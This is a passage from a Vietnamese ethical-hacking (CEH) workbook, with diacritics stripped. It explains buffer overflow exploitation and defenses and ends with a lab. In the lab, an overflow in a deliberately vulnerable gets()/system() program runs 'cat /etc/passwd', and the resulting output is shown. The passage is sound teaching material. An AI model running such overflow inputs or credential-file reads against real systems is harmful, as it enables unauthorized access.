chim quyn iu khin mt tin trnh ty theovng b nh m b m c t ti . V d, vng b nh stack, ni d liu c th ctm thi "y" xung "nh" ngn xp (push), v sau c "nhc ra" (pop) c gi trca bin. Thng thng, khi mt hm (function) bt u thc thi, cc phn t d liu tm thi(cc bin a phng) c y vo, v chng trnh c th truy nhp n cc d liu nytrong sut thi gian chy hm . Khng ch c hin tng trn stack (stack overflow) m cnc c trn heap (heap overflow).Trong v d sau, "X" l d liu tng nm ti stack khi chng trnh bt u thc thi; sau chng trnh gi hm "Y", hm ny i hi mt lng nh b nh cho ring mnh; v sau "Y" gi hm "Z", "Z" i hi mt b nh m ln:Nu hm "Z" gy trn b nh m, n c th ghi d liu thuc v hm Y hay chngtrnhchnh:iu ny c bit nghim trng i vi hu ht cc h thng. Ngoi cc d liu thng, bnh stack cn lu gi a ch tr v, ngha l v tr ca phn chng trnh ang chy trc khihm hin ti c gi. Khi hm kt thc, vng b nh tm thi s c ly ra khi stack, vthc thi c trao li cho a ch tr v. Nh vy, nu a ch tr v b ghi bi mt litrn b m, n s tr ti mt v tr no khc. Trong trng hp mt hin tng trn bm khng c ch nh trong v d u tin, hu nh chc chn rng v tr s l mt v trkhng hp l, khng cha mt lnh no ca chng trnh, v tin trnh s v. Tuy nhin,mt k tn cng c th chnh a ch tr v tr ti mt v tr ty sao cho n c th lm tnhi an hinh h thng.M ngun v dM ngun C di y th hin mt li lp trnh thng gp. Sau khi c bin dch, chngVSIC Education Corporation Trang 112 40. Gio trnh bi tp C|EH Ti liu dnh cho hc vintrnh s to ra mt li trn b m nu n c gi vi mt tham s dng lnh l mt xu kt qu di, v tham s ny c dng ghi vo mt b nh m m khng kim tra dica n.************/* overflow.c - demonstrates a buffer overflow */#include#includeint main(int argc, char *argv[]){char buffer[10];if (argc < 2){fprintf(stderr, "USAGE: %s stringn", argv[0]);return 1;}strcpy(buffer, argv[1]);return 0;}************Cc xu k t di khng qu 9 s khng gy trn b m. Cc xu k t gm t 10 k ttr ln s gy trn b m: hin tng ny lun lun l mt li sai nhng khng phi lc nocng gy ra vic chng trnh chy sai hay gy li segmentation faultsChng trnh trn c th c vit li cho an ton bng cch s dng hm strncpy nh sau:********/* better.c - demonstrates one method of fixing the problem */VSIC Education Corporation Trang 113 41. Gio trnh bi tp C|EHTi liu dnh cho hc vin#include#includeint main(int argc, char *argv[]){char buffer[10];if (argc < 2){fprintf(stderr, "USAGE: %s stringn", argv[0]);return 1;}strncpy(buffer, argv[1], sizeof(buffer));buffer[sizeof(buffer) - 1] = 0;return 0;}*******Khai thcC cc k thut khc nhau cho vic khai thc li trn b nh m, ty theo kin trc my tnh,h iu hnh v vng b nh. V d, khai thc ti heap (dng cho cc bin cp pht ng) rtkhc vi vic khai thc cc bin ti stack.Khai thc li trn b m trn stackMt ngi dng tho k thut v c xu c th khai thc cc li trn b m trn stack thao tng chng trnh theo mt trong cc cch sau:Ghi mt bin a phng nm gn b nh m trong stack thay i hnh vi ca chngtrnh nhm to thun li cho k tn cng.Ghi a ch tr v trong mt khung stack (stack frame). Khi hm tr v, thc thi s cVSIC Education CorporationTrang 114 42. Gio trnh bi tp C|EHTi liu dnh cho hc vintip tc ti a ch m k tn cng ch r, thng l ti mt b m cha d liu vo cangi dng.Nu khng bit a ch ca phn d liu ngi dng cung cp, nhng bit rng a ch ca nc lu trong mt thanh ghi, th c th ghi ln a ch tr v mt gi tr l a ch ca mtopcode m opcode ny s c tc dng lm cho thc thi nhy n phn d liu ngi dng. Cth, nu a ch on m c hi mun chy c ghi trong mt thanh ghi R, th mt lnhnhy n v tr cha opcode cho mt lnh jump R, call R (hay mt lnh tng t vi hiu ngnhy n a chi ghi trong R) s lm cho on m trong phn d liu ngi dng c thcthi. C th tm thy a ch ca cc opcode hay cc byte thch hp trong b nh ti cc thvin lin kt ng (DLL) hay trong chnh file thc thi. Tuy nhin, a ch ca opcode thng khng c cha mt k t null (hay byte 0) no, v a ch ca cc opcode ny cth khc nhau ty theo cc ng dng v cc phin bn ca h iu hnh.D n Metapoloit lmt trong cc c s d liu cha cc opcode thch hp, tuy rng trong ch lit k ccopcode trong h iu hnh Microsoft Windows.Khai thc li trn b m trn heapMt hin tng trn b m xy ra trong khu vc d liu heap c gi l mt hin tngtrn heap v c th khai thc c bng cc k thut khc vi cc li trn stack. B nh heapc cp pht ng bi cc ng dng ti thi gian chy v thng cha d liu ca chngtrnh. Vic khai thc c thc hin bng cch ph d liu ny theo cc cch c bit lmcho ng dng ghi ln cc cu trc d liu ni b chng hn cc con tr ca danh sch linkt. L hng ca Microsoft JPG GDI+l mt v d gn y v s nguy him m mt li trnheap.Cn tr i vi cc th thut khai thcVic x l b m trc khi c hay thc thi n c th lm tht bi cc c gng khai thc litrn b m. Cc x l ny c th gim bt mi e da ca vic khai thc li, nhng c thkhng ngn chn c mt cch tuyt i. Vic x l c th bao gm: chuyn t ch hoathnh ch thng, loi b cc k t t bit (metacharacters) v lc cc xu khng cha k tl ch s hoc ch ci. Tuy nhin, c cc k thut trnh vic lc v x l ny;alphanumeric code (m gm ton ch v s), polymorphic code (m a hnh), Self-modifyingcode (m t sa i) v tn cng kiu return-to-libc.. Cng chnh cc phng php ny c thc dng trnh b pht hin bi cc h thng pht hin thm nhp (Intrusion detectionsystem).Chng trn b mNhiu k thut a dng vi nhiu u nhc im c s dng pht hin hoc ngnchn hin tng trn b m. Cch ng tin cy nht trnh hoc ngn chn trn b m ls dng bo v t ng ti mc ngn ng lp trnh. Tuy nhin, loi bo v ny khng th pdng cho m tha k (legacy code), v nhiu khi cc rng buc k thut, kinh doanh hay vnha li i hi s dng mt ngn ng khng an ton. Cc mc sau y m t cc la chn vci t hin c.La chn ngn ng lp trnhVSIC Education Corporation Trang 115 43. Gio trnh bi tp C|EHTi liu dnh cho hc vinLa chn v ngn ng lp trnh c th c mt nh hng ln i vi s xut hin ca li trnb m. Nm 2006, C v C++ nm trong s cc ngn ng lp trnh thng dng nht, vi mtlng khng l cc phn mm c vit bng hai ngn ng ny. C v C++ khng cung cpsn cc c ch chng li vic truy nhp hoc ghi d liu ln bt c phn no ca b nhthng qua cc con tr bt hp l; c th, hai ngn ng ny khng kim tra xem d liu cghi vo mt mng ci t ca mt b nh m) c nm trong bin ca mng hay khng.Tuy nhin, cn lu rng cc th vin chun ca C++, th vin khun mu chun - STL,cung cp nhiu cch an ton lu tr d liu trong b m, v cc lp trnh vin C cng cth to v s dng cc tin ch tng t. Cng nh i vi cc tnh nng bt k khc ca Chay C++, mi lp trnh vin phi t xc nh la chn xem h c mun chp nhn cc hn chv tc chng trnh thu li cc li ch tim nng ( an ton ca chng trnh) haykhng.Mt s bin th ca C, chng hn Cyclone, gip ngn chn hn na cc li trn b m bngvic chng hn nh gn thng tin v kch thc mng vi cc mng. Ngn ng lp trnh D sdng nhiu k thut a dng trnh gn ht vic s dng con tr v kim tra bin do ngidng xc nh.Nhiu ngn ng lp trnh khc cung cp vic kim tra ti thi gian chy, vic kim tra ny gimt cnh bo hoc ngoi l khi C hoc C++ ghi d liu. V d v cc ngn ng ny rt adng, t pythol ti Ada, t Lisp ti Modula-2, v t Smalltalk ti OCaml. Cc mi trngbytecode ca Java v .NET cng i hi kim tra bin i vi tt c cc mng. Gn nh tt ccc ngn ng thng dch s bo v chng trnh trc cc hin tng trn b m bng cchthng bo mt trng thi li nh r (well-defined error). Thng thng, khi mt ngn ngcung cp thng tin v kiu thc hin kim tra bin, ngn ng thng cho php lachn kch hot hay tt ch . Vic phn tch tnh (static analysis) c th loi c nhiukim tra kiu v bin ng, nhng cc ci t ti v cc trng hp ri rm c th gim ngk hiu nng. Cc k s phn mm phi cn thn cn nhc gia cc ph tn cho an ton vhiu nng khi quyt nh s s dng ngn ng no v cu hnh nh th no cho trnh bindch.S dng cc th vin an tonVn trn b m thng gp trong C v C++ v cc ngn ng ny l cc chi tit biudin mc thp ca cc b nh m vi vai tr cc ch cha cho cc kiu d liu. Do , phitrnh trn b m bng cch gn gi tnh ng n cao cho cc phn m chng trnh thchin vic qun l b m. Vic s dng cc th vin c vit tt v c kim th, dnhcho cc kiu d liu tru tng m cc th vin ny thc hin t ng vic qun l b nh,trong c kim tra bin, c th lm gim s xut hin v nh hng ca cc hin tng trnb m. Trong cc ngn ng ny, xu k t v mng l hai kiu d liu chnh m ti cchin tng trn b m thng xy ra; do , cc th vin ngn chn li trn b m ti cckiu d liu ny c th cung cp phn chnh ca s che chn cn thit. D vy, vic s dngcc th vin an ton mt cch khng ng c th dn n trn b m v mt s l hngkhc; v tt nhin, mt li bt k trong chnh th vin chnh n cng l mt l hng. Cc cit th vin "an ton" gm The Better String Library, Arri Buffer API v Vstr. Th vin CVSIC Education CorporationTrang 116 44. Gio trnh bi tp C|EHTi liu dnh cho hc vinca h iu hnh OpenBSD cung cp cc hm hu ch strlcpy strlcat nhng cc hm nynhiu hn ch hn nhiu so vi cc ci t th vin an ton y .Thng 9 nm 2006, Bo co k thut s 24731 ca hi ng tiu chun C c cng b;bo co ny m t mt tp cc hm mi da trn cc hm vo ra d liu v cc hm x l xuk t ca th vin C chun, cc hm mi ny c b sung cc tham s v kch thc bm.Chng trn b nh m trn stackStack-smashing protection l k thut c dng pht hin cc hin tng trn b m phbin nht. K thut ny kim tra xem stack b sa i hay cha khi mt hm tr v. Nustack b sa , chng trnh kt thc bng mt li segmentation fault. Cc h thng sdng k thut ny gm c Libsafe, StackGuard v cc bn v li (patch) PropolicyCh Data Execution Prevention (cm thc thi d liu) ca Microsoft bo v thng cc contr ti SEH Exception Handler, khng cho chng b ghi .C th bo v stack hn na bng cch phn tch stack thnh hai phn, mt phn dnh cho dliu v mt phn cho cc bc tr v ca hm. S phn chia ny c dng trong ngn nglp trnh Forth, tuy n khng phi mt quyt nh thit k da theo tiu ch an ton. Nhng dsao th y cng khng phi mt gii php hon chnh i vi vn trn b m, khi cc dliu nhy cm khng phi a ch tr v vn c th b ghi .Bo v khng gian thc thiBo v khng gian thc thi l mt cch tip cn i vi vic chng trn b m. K thut nyngn chn vic thc thi m ti stack hay heap. Mt k tn cng c th s dng trn b m chn mt on m ty vo b nh ca mt chng trnh, nhng vi bo v khng gian thcthi, mi c gng chy on m s gy ra mt ngoi l (exception).Mt s CPU h tr mt tnh nng c tn bit NX ("No eXecute" - "Khng thc thi") hoc bitXD ("eXecute Disabled" - "ch thc thi b tt" ). Khi kt hp vi phn mm, cc tnhnng ny c th c dng nh du cc trang d liu (chng hn cc trang cha stack vheap) l c c nhng khng thc thi c.Mt s h iu hnh Unix (chng hn OpenBSD, Mac OS X) c km theo tnh nng bo vkhng gian thc thi. Mt s gi phn mm ty chn bao gm:PaXExec ShieldOpenwallVSIC Education CorporationTrang 117 45. Gio trnh bi tp C|EH Ti liu dnh cho hc vinCc bin th mi ca Microsoft Windows cng h tr bo v khng gian thc thi, vi tn giData Execution Prevention (ngn chn thc thi d liu). Cc phn mm gn km (Add-on)bao gm:SecureStackOverflowGuardBufferShieldStackDefenderPhng php bo v khng gian thc thi khng chng li c tn cng return-to-libc.Ngu nhin ha s khng gian a chNgu nhin ha s khng gian a ch (Address space layout randomization - ASLR) lmt tnh nng an ninh my tnh c lin quan n vic sp xp v tr cc vng d liu quantrng (thng bao gm ni cha m thc thi v v tr cc th vin, heap v stack) mt cchngu nhin trong khng gian a ch ca mt tin trnh.Vic ngu nhin ha cc a ch b nh o m cc hm v bin nm ti lm cho vic khaithc mt li trn b m tr nn kh khn hn, nhng phi l khng th c. N cn buck tn cng phi iu chnh khai thc cho hp vi tng h thng c th, iu ny lm tht bic gng ca cc con Su internet Mt phng php tng t nhng km hiu qu hn, lk thut rebase i vi cc tin trnh v th vin trong khng gian a ch o.Kim tra su i vi gi tinBin php kim tra su i vi gi tin (deep packet inspection - DPI) c th pht hin cc cgng t xa khai thc li trn b m ngay t bin gii mng. Cc k thut ny c kh nngchn cc gi tin c cha ch k ca mt v tn cng bit hoc cha mt chui di cc lnhNo-Operation (NOP - lnh rng khng lm g), cc chui nh vy thng c s dng khi vtr ca ni dung quan trng (payload) ca tn cng hi c bin i.Vic r cc gi tin khng phi l mt phng php hiu qu v n ch c th ngn chn cctn cng bit, v c nhiu cch m ha mt lnh NOP. Cc k tn cng c th sdng m alphanumeric, metamorphic, v Shellcode t sa trnh b pht hin bi vic r gitin.II/ Thc hnh: Ta khi ng h iu hnh Linux bng da CD, sau son 1 on code c ni dungsau:VSIC Education Corporation Trang 118 46. Gio trnh bi tp C|EH Ti liu dnh cho hc vin#include main() {char *name;char *dangerous_system_command;name = (char *) malloc(10);dangerous_system_command = (char *) malloc(128);printf("Address of name is %dn", name);printf("Address of command is %dn", dangerous_system_command);sprintf(dangerous_system_command, "echo %s", "Hello world!");printf("Whats your name?");gets(name);system(dangerous_system_command);}Lu on sau y thnh file text v bin dch bng gccroot@1[Desktop]# gcc buffer.c -o bufferbuffer.c:13:2: warning: no newline at end of file/tmp/ccefevDP.o(.text+0x82): In function `main:: warning: the `gets function is dangerous and should not be used.root@1[Desktop]# ./bufferAddress of name is 134520840Address of command is 134520856Whats your name?haoHello world!root@1[Desktop]# ./bufferAddress of name is 134520840Address of command is 134520856Whats your name?1234567890123456cat /etc/passwdroot:x:0:0:root:/home/knoppix:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shVSIC Education Corporation Trang 119 47. Gio trnh bi tp C|EHTi liu dnh cho hc vinproxy:x:13:13:proxy:/bin:/bin/shmajordom:x:30:31:Majordomo:/usr/lib/majordomo:/bin/shpostgres:x:31:32:postgres:/var/lib/postgres:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shmsql:x:36:36:Mini SQL Database Manager:/var/lib/msql:/bin/shoperator:x:37:37:Operator:/var:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats/gnats-db:/bin/shmysql:x:100:103:MySQL Server:/var/lib/mysql:/bin/falsepostfix:x:102:65534:Postfix Mailsystem:/var/spool/postfix:/bin/falseknoppix:x:1000:1000:Kanotix User:/home/knoppix:/bin/bashnobody:x:65534:65534:nobody:/nonexistent:/bin/shsshd:x:103:65534:SSH Server:/var/run/sshd:/bin/falsepartimag:x:104:65534::/home/partimag:/bin/falsetelnetd:x:101:101::/usr/lib/telnetd:/bin/falsedistccd:x:105:65534::/:/bin/falsebind:x:106:108::/var/cache/bind:/bin/falsemessagebus:x:108:1002::/var/run/dbus:/bin/falsecaptive:x:109:65534::/var/lib/captive:/bin/falsesslwrap:x:107:1001::/etc/sslwrap:/bin/falsedistmp3:x:112:112::/nonexistent:/bin/falsesaned:x:114:114::/home/saned:/bin/falsearpwatch:x:110:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/shsnort:x:111:117:Snort IDS:/var/log/snort:/bin/falsethpot:x:113:65534:Security Officer,,,:/usr/share/thpot:/dev/nullftp:x:115:65534::/home/ftp:/bin/falsefreerad:x:116:118::/etc/freeradius:/bin/falsedebian-tor:x:119:119::/var/lib/tor:/bin/bash Ta thc thi c lnh cat /etc/passwd thng qua li trn b m.VSIC Education CorporationTrang 120


CEH Lab Setup

Ceh Hacking

CEH Exam 312-50 - CEH v8

CEH Classroom Lab Setup v6 - IT-DOCS · EC-Council CEH v6 Instructor Lab Setup Guide 2 Table of Contents Classroom Setup Instructions: CEHv6

EC-Council - CEH v8 Labs Module 04 Enumeration Lab Manual 2013

EC-Council - CEH v8 Labs Module 18 Buffer Overflow Lab Manual 2013

23365719 CEH Classroom Lab Setup v6

SinhVienIT.net---CEH Lab Book Tieng Viet Phan1

EC-Council - CEH v8 Labs Module 02 Footprinting and Reconnaissance Lab Manual 2013

EC-Council - CEH v8 Labs Module 03 Scanning Networks Lab Manual 2013

EC-Council - CEH v8 Labs Module 13 Hacking Web Applications Lab Manual 2013

CEH v7 and CEH v6.1 Exam Objectives Comparison

EC-Council - CEH v8 Labs Module 09 Social Engineering Lab Manual 2013

EC-Council - CEH v8 Labs Module 08 Sniffers Lab Manual 2013

Formation CEH Certified Ethical Hacker v10 EC-Council CEH

EC-Council - CEH v8 Labs Module 15 Hacking Wireless Networks Lab Manual 2013

Tailieuthuchanh Ceh

Ceh lab book_tieng_viet_phan1

EC-Council - CEH v8 Labs Module 14 SQL Injection Lab Manual 2013

CEH Classroom Lab Setup v6 - cr3ativ3.free.frcr3ativ3.free.fr/CEH/CEH-Classroom-Lab-Setup-v6.pdf · EC-Council CEH v6 Instructor Lab Setup Guide 2 Table of Contents Classroom Setup

CEH Lab Book Tieng Viet Phan1

CEH Lab Manualdocshare01.docshare.tips/files/18489/184890979.pdf · 2016. 6. 1. · Tools\CEHv8 Module 03 Scanning Networks Ethical Hacking and ... CEH Lab Manual Page S5. Module

CEH - آموزش کاربردی امنیت شبکهdownload.netamooz.net/files/ceh-lab-book-demo.pdf · 2019. 12. 16. · WinArpAttacker Tool راﺰﺑا ﺎﺑ ﻪﮑﺒﺷﮏﯾدﻮﻨﺷ

CEH Lab Book Tieng Viet Phan 3

EC-Council - CEH v8 Labs Module 19 Cryptography Lab Manual 2013

CEH Brochure

EC-Council - CEH v8 Labs Module 12 Hacking Webservers Lab Manual 2013

CEH ethylbenzene

UPX Lab-11 CEH · UPX Lab-11 CEH Lab 1: UPX Program Packer. Lets use UPX Program Packer on Netcat and see what we happens. First lets get the MD5 hash of Netcat and see what it looks

EC-Council - CEH v8 Labs Module 06 Trojans and Backdoors Lab Manual 2013

EC-Council - CEH v8 Labs Module 17 Evading IDS, Firewalls and Honeypots Lab Manual 2013

VanLuong.blogspot.com CEH

Tracker ceh

#EthicalHackx CEH v9 EthicalHackx · 2018-05-01 · #EthicalHackx CEH v9 EthicalHackx.com #EthicalHackx CEH v9 EthicalHackx.com

Ceh classroom-lab-setup-v6